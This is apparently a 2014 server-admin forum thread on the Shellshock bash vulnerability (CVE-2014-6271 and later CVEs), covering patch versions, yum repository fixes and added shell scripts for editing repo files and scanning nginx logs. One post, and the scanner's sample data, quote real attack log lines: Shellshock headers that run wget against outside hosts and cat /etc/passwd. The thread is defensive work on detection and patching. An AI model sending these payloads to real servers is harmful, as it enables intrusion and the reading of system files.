Security Bash Code Injection Vulnerability CVE-2014-6271 (update bash)

Discussion in 'CentOS, Redhat & Oracle Linux News' started by eva2000, Sep 25, 2014.

  1. eva2000

    eva2000 Administrator Staff Member

    54,601
    12,225
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,794
    Local Time:
    9:58 PM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    waiting game :)

     
  2. eva2000

    For those using Oracle Linux 6.5

    Code:
    yum list bash -q
    Installed Packages
    bash.x86_64                                           4.1.2-15.el6_5.1.0.1                                            @ol6_latest
    Code:
    rpm -qa --changelog bash | head -n10
    * Thu Sep 25 2014 John Haxby <john.haxby@oracle.com> - 4.1.2-15.1.0.1
    - Preliminary fix for CVE-2014-7169
    
    * Mon Sep 15 2014 Ondrej Oprala <ooprala@redhat.com - 4.1.2-15.1
    - Check for fishy environment [CVE-2014-6271]
      Resolves: #1141645
     
  3. eva2000

    For Linode users who have yet to see the 2nd bash update, it's because Linode uses its own baseurl mirror for the base and updates streams. You can speed this up by editing /etc/yum.repos.d/CentOS-Base.repo

    and commenting out the baseurl lines for [base] and [updates] respectively

    for [base]
    Code:
    #baseurl=http://mirrors.linode.com/centos/$releasever/os/$basearch/
    for [updates]
    Code:
    #baseurl=http://mirrors.linode.com/centos/$releasever/updates/$basearch/
    contents of /etc/yum.repos.d/CentOS-Base.repo with commented out baseurl lines
    Code:
           
    # CentOS-Base.repo
    #
    # The mirror system uses the connecting IP address of the client and the
    # update status of each mirror to pick mirrors that are updated to and
    # geographically close to the client.  You should use this for CentOS updates
    # unless you are manually picking other mirrors.
    #
    # If the mirrorlist= does not work for you, as a fall back you can try the
    # remarked out baseurl= line instead.
    #
    #
    
    [base]
    name=CentOS-$releasever - Base
    mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=os
    #baseurl=http://mirrors.linode.com/centos/$releasever/os/$basearch/
    gpgcheck=1
    gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
    priority=1
    
    #released updates
    [updates]
    name=CentOS-$releasever - Updates
    mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=updates
    #baseurl=http://mirrors.linode.com/centos/$releasever/updates/$basearch/
    gpgcheck=1
    gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
    priority=1
    
    #additional packages that may be useful
    [extras]
    name=CentOS-$releasever - Extras
    mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=extras
    baseurl=http://mirrors.linode.com/centos/$releasever/extras/$basearch/
    gpgcheck=1
    gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
    priority=1
    
    #additional packages that extend functionality of existing packages
    [centosplus]
    name=CentOS-$releasever - Plus
    mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=centosplus
    baseurl=http://mirrors.linode.com/centos/$releasever/centosplus/$basearch/
    gpgcheck=1
    enabled=0
    gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
    priority=2
    
    #contrib - packages by Centos Users
    [contrib]
    name=CentOS-$releasever - Contrib
    mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=contrib
    baseurl=http://mirrors.linode.com/centos/$releasever/contrib/$basearch/
    gpgcheck=1
    enabled=0
    gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
    priority=2
    Then you can see the update, this is on CentOS 6.5 with Linode
    Code:
    yum list bash -q
    Installed Packages
    bash.x86_64                        4.1.2-15.el6_5.1                         @updates
    Available Packages
    bash.x86_64                        4.1.2-15.el6_5.2                         updates
     
    Last edited: Sep 27, 2014
  4. Omer

    Omer New Member

    10
    8
    3
    Sep 11, 2014
    Ratings:
    +8
    Local Time:
    1:58 PM
    Nginx 1.7.5
    MariaDB 5.5
    Thanks for notification.
     
  6. eva2000

    Bash shellshock FAQ by Redhat added to first post

    excerpt
     
  7. Guilherme Jaccoud

    Guilherme Jaccoud Member

    63
    30
    18
    May 29, 2014
    Ratings:
    +30
    Local Time:
    8:58 AM
    I can't update :/
    Centos 6.4 x64 DigitalOcean

    [root@server ~]# yum update bash
    Loaded plugins: downloadonly, fastestmirror, priorities
    Determining fastest mirrors
    epel/metalink | 9.7 kB 00:00
    * base: mirror.atlanticmetro.net
    * epel: mirrors.mit.edu
    * extras: mirrors.mit.edu
    * rpmforge: repoforge.mirror.constant.com
    * updates: centos.hostingxtreme.com
    http://centos.alt.ru/repository/centos/6/x86_64/repodata/repomd.xml: [Errno 14] PYCURL ERROR 22 - "The requested URL returned error: 403 Forbidden"
    Trying other mirror.
    Error: Cannot retrieve repository metadata (repomd.xml) for repository: CentALT. Please verify its path and try again
     
  8. eva2000

    you must be on an older centmin mod which had CentALT enabled; that repo is dead now, so edit /etc/yum.repos.d/centalt.repo and set enable=0

    then run

    Code:
    yum clean all
    yum update
    edit: also made a yum-cron thread at Automatic nightly YUM updates with yum-cron :)
     
    Last edited: Sep 28, 2014
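    The two repo edits described in this thread (commenting out Linode's baseurl lines for [base] and [updates] in post #3, and disabling the dead CentALT repo in this post) as one script, added here as an example; it is not code from the thread or from Centmin Mod. It uses awk so that only the named [sections] are touched, and it writes `enabled=0`, the key name yum reads. The repo file contents and the mktemp paths in the demo are constructed; on a real server you would point the functions at /etc/yum.repos.d/CentOS-Base.repo and /etc/yum.repos.d/centalt.repo and then run `yum clean all` as above.

```shell
#!/bin/sh
# Added example (not from the thread): section-aware edits to yum .repo files.

# comment_baseurl FILE SECTION... -> comment out every "baseurl=" line inside the listed sections only
comment_baseurl() {
    file=$1; shift
    awk -v targets="$*" '
        BEGIN { n = split(targets, t, " "); for (i = 1; i <= n; i++) want[t[i]] = 1 }
        /^\[[^]]*\]/ { sec = $0; sub(/^\[/, "", sec); sub(/\].*$/, "", sec) }
        (sec in want) && /^baseurl=/ { print "#" $0; next }
        { print }
    ' "$file" > "$file.tmp" && mv "$file.tmp" "$file"
}

# disable_repo FILE -> force enabled=0 in every section of FILE (adding the key where a section lacks it)
disable_repo() {
    file=$1
    awk '
        function close_section() { if (insec && !seen) print "enabled=0"; seen = 0 }
        /^\[[^]]*\]/ { close_section(); insec = 1; print; next }
        insec && /^enabled=/ { print "enabled=0"; seen = 1; next }
        { print }
        END { close_section() }
    ' "$file" > "$file.tmp" && mv "$file.tmp" "$file"
}

# active_baseurls FILE -> number of uncommented baseurl= lines left in FILE
active_baseurls() { grep -c '^baseurl=' "$1" || true; }

# enabled_sections FILE -> number of sections still carrying enabled=1
enabled_sections() { grep -c '^enabled=1' "$1" || true; }

# demo_repo_edits -> writes constructed CentOS-Base.repo and centalt.repo excerpts into a
# temp dir, applies both edits, and prints the directory path
demo_repo_edits() {
    dir=$(mktemp -d)
    cat > "$dir/CentOS-Base.repo" <<'EOF'
[base]
name=CentOS-$releasever - Base
mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=os
baseurl=http://mirrors.linode.com/centos/$releasever/os/$basearch/
gpgcheck=1

[updates]
name=CentOS-$releasever - Updates
mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=updates
baseurl=http://mirrors.linode.com/centos/$releasever/updates/$basearch/
gpgcheck=1

[extras]
name=CentOS-$releasever - Extras
baseurl=http://mirrors.linode.com/centos/$releasever/extras/$basearch/
gpgcheck=1
EOF
    # Constructed CentALT stanza; only the baseurl host comes from the thread's yum error
    cat > "$dir/centalt.repo" <<'EOF'
[CentALT]
name=CentALT Packages for Enterprise Linux 6
baseurl=http://centos.alt.ru/repository/centos/6/x86_64/
enabled=1
gpgcheck=0
EOF
    comment_baseurl "$dir/CentOS-Base.repo" base updates   # [extras] keeps its baseurl
    disable_repo "$dir/centalt.repo"
    echo "$dir"
}

# Stand-alone run: show the edited files, then clean up
d=$(demo_repo_edits)
cat "$d"/*.repo
rm -rf "$d"
```

    After `yum clean all`, `yum list bash -q` should then show the 4.1.2-15.el6_5.2 build from the mirrorlist, as in the output posted above.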
  9. Guilherme Jaccoud

    Great!
    Yup… two of my servers had CentosAlt enabled.
    Just updated 5 servers, thanks :)
     
  10. eva2000

    Great to hear :)

    You must be using an older Centmin Mod? Which version? The latest updated .07 stable has a check for this and auto-disables the centalt repo if it is detected as enabled when running centmin.sh - see lines 17-22 of inc/cpcheck.inc
     
  11. Guilherme Jaccoud

    [root@venus ~]# cat /etc/centminmod-release
    1.2.3-eva2000.07

    [root@jupiter ~]# cat /etc/centminmod-release
    1.2.3-eva2000.07

    [root@mars ~]# cat /etc/centminmod-release
    1.2.3-eva2000.07

    [root@saturn ~]# cat /etc/centminmod-release
    1.2.3-eva2000.07

    [root@uranus ~]# cat /etc/centminmod-release
    1.2.3-eva2000.07

    strangely enough, only MARS (which is my development web server and was rebuilt most recently) was not affected by the CentosALT repo.

    Cheers Eva!
     
  13. Guilherme Jaccoud

    Great, I will be updating these servers soon. Will be back at home in some weeks and I want to start playing with .08 beta and also, finish the logo we started months ago!
     
  15. eva2000

    Damn, we're not out of the woods completely, more vulnerabilities in bash! :eek:

    New ones for CVE-2014-6277 (RedHat/CentOS not vulnerable) and CVE-2014-6278 (not yet patched for Redhat/CentOS) (info at Further flaws render Shellshock patch ineffective - Security - News - iTnews.com.au and at lcamtuf's blog: Bash bug: apply Florian's patch now (CVE-2014-6277 and CVE-2014-6278))
     
    Last edited: Sep 30, 2014
  16. deltahf

    deltahf Premium Member Premium Member

    587
    265
    63
    Jun 8, 2014
    Ratings:
    +489
    Local Time:
    6:58 AM
    Thanks for helping stay on top of this issue, George. I have patched my system earlier (I believe the Linode repositories are updated now because I am running 15.el6_5.2 after doing a yum update bash on a VPS with them earlier today).

    Unfortunately, I have been away on a camping trip since all of this broke out and I have been slow to apply this, and searching my Nginx logs shows that some people have been probing my server. A grep search for ":\;" returns the following results:

    Code:
    83.166.234.133 - - [26/Sep/2014:19:13:23 -0400] "GET / HTTP/1.0" 200 55008 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://gtplanet.net/\x22"
    
    83.166.234.133 - - [26/Sep/2014:19:21:14 -0400] "GET / HTTP/1.0" 200 49990 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://gtplanet.net/\x22"
    
    62.210.75.170 - - [29/Sep/2014:06:58:17 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 22333 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:17 -0400] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 22332 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:18 -0400] "GET /cgi-mod/index.cgi HTTP/1.1" 404 22324 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:18 -0400] "GET / HTTP/1.1" 200 55041 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:18 -0400] "GET /cgi-bin-sdb/printenv HTTP/1.1" 404 22327 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 22333 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:19 -0400] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 22332 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:19 -0400] "GET / HTTP/1.1" 200 55041 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:19 -0400] "GET /cgi-bin-sdb/printenv HTTP/1.1" 404 22327 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    62.210.75.170 - - [29/Sep/2014:06:58:19 -0400] "GET /cgi-mod/index.cgi HTTP/1.1" 404 22324 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
    
    I also found two other suspicious requests when searching for "passwd":

    Code:
    85.25.242.250 - - [27/Sep/2014:12:17:43 -0400] "GET / HTTP/1.1" 200 54987 "-" "() { foo;};echo;/bin/cat /etc/passwd"
    
    85.25.242.250 - - [28/Sep/2014:09:28:46 -0400] "GET / HTTP/1.1" 200 55041 "-" "() { foo;};echo;/bin/cat /etc/passwd"
    Should I be concerned about this? I have just installed the maldet Centminmod plugin as you linked in the other thread and I'm running a scan on the entire system now. Is there anything else you would recommend to check if a system has been compromised?
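    A small log scanner for the probes shown in this post, added here as an example; it is not code from the thread or from Centmin Mod. Instead of grepping for `:\;`, it matches the `() {` function-definition prefix that every Shellshock probe starts with, so it also picks up the `() { foo;};` variant from the "passwd" search above, and it reports which request field (referer, user-agent, or both) carried the payload. Nginx's default combined format quotes the request, referer and user-agent, so splitting on `"` gives them as awk fields 2, 4 and 6. The sample log is constructed from a few of the lines posted above plus one ordinary request from a documentation address (203.0.113.5).

```shell
#!/bin/sh
# Added example (not from the thread): find Shellshock probes in an nginx access log.

# scan_shellshock FILE -> one tab-separated line per hit: ip, timestamp, request, which field carried it
scan_shellshock() {
    awk -F'"' '
        {
            split($1, pre, " "); ip = pre[1]
            ts = $1; sub(/^[^[]*\[/, "", ts); sub(/\].*$/, "", ts)
            where = ""
            if ($4 ~ /\(\) *[{]/) where = "referer"
            if ($6 ~ /\(\) *[{]/) where = (where == "" ? "user-agent" : where ",user-agent")
            if (where != "") printf "%s\t%s\t%s\t%s\n", ip, ts, $2, where
        }' "$1"
}

# count_shellshock FILE -> number of probing requests in FILE
count_shellshock() { scan_shellshock "$1" | wc -l | tr -d ' '; }

# top_sources FILE -> "count ip" per probing address, most active first
top_sources() { scan_shellshock "$1" | cut -f1 | sort | uniq -c | sort -rn; }

# make_sample_log -> path to a constructed log: four probe lines from the thread plus one benign request
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
83.166.234.133 - - [26/Sep/2014:19:13:23 -0400] "GET / HTTP/1.0" 200 55008 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://gtplanet.net/\x22"
62.210.75.170 - - [29/Sep/2014:06:58:17 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 22333 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:06:58:18 -0400] "GET /cgi-bin-sdb/printenv HTTP/1.1" 404 22327 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Z3RwbGFuZXQubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null'"
85.25.242.250 - - [27/Sep/2014:12:17:43 -0400] "GET / HTTP/1.1" 200 54987 "-" "() { foo;};echo;/bin/cat /etc/passwd"
203.0.113.5 - - [29/Sep/2014:07:00:00 -0400] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (constructed benign request)"
EOF
    echo "$f"
}

# Stand-alone run: scan the constructed sample and summarise it
log=$(make_sample_log)
scan_shellshock "$log"
echo "probes: $(count_shellshock "$log")"
top_sources "$log"
rm -f "$log"
```

    Point `scan_shellshock` at the real access log (with Centmin Mod's default layout that is /var/log/nginx/ or a per-vhost log) to get the same per-hit listing. Note that a hit only tells you the payload was received; whether it ran depends on whether anything on the server passed those headers into bash (CGI, for example), which is why the maldet scan and the bash update are the answer to "should I be concerned".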
     
  18. deltahf

    OK, thanks; I just completed a scan of my entire system (for all files changed within the past 7 days):
    Code:
    maldet -r / 7
    
    And it returned no malware hits. :) I will keep doing more scans over the next few days as the malware definitions are updated. I have been researching my log entries to see if I could figure out what the attackers were trying to do, and I found this page which offers a pretty good overview of various attacks which have been seen in the wild.

    I believe my attackers were trying to log fake ad clicks with "dipad.biz". I am not sure what the "creditstat.ru" URL does, as it appears to direct the page contents to /dev/null. Should I be concerned about the /etc/passwd requests?
     
  19. eva2000

    you can do a full scan with

    Code:
    maldet -a /
     
  20. eva2000

    More info on latest CVE-2014-6278 at Shellshock fixes beget another round of patches as attacks mount | Ars Technica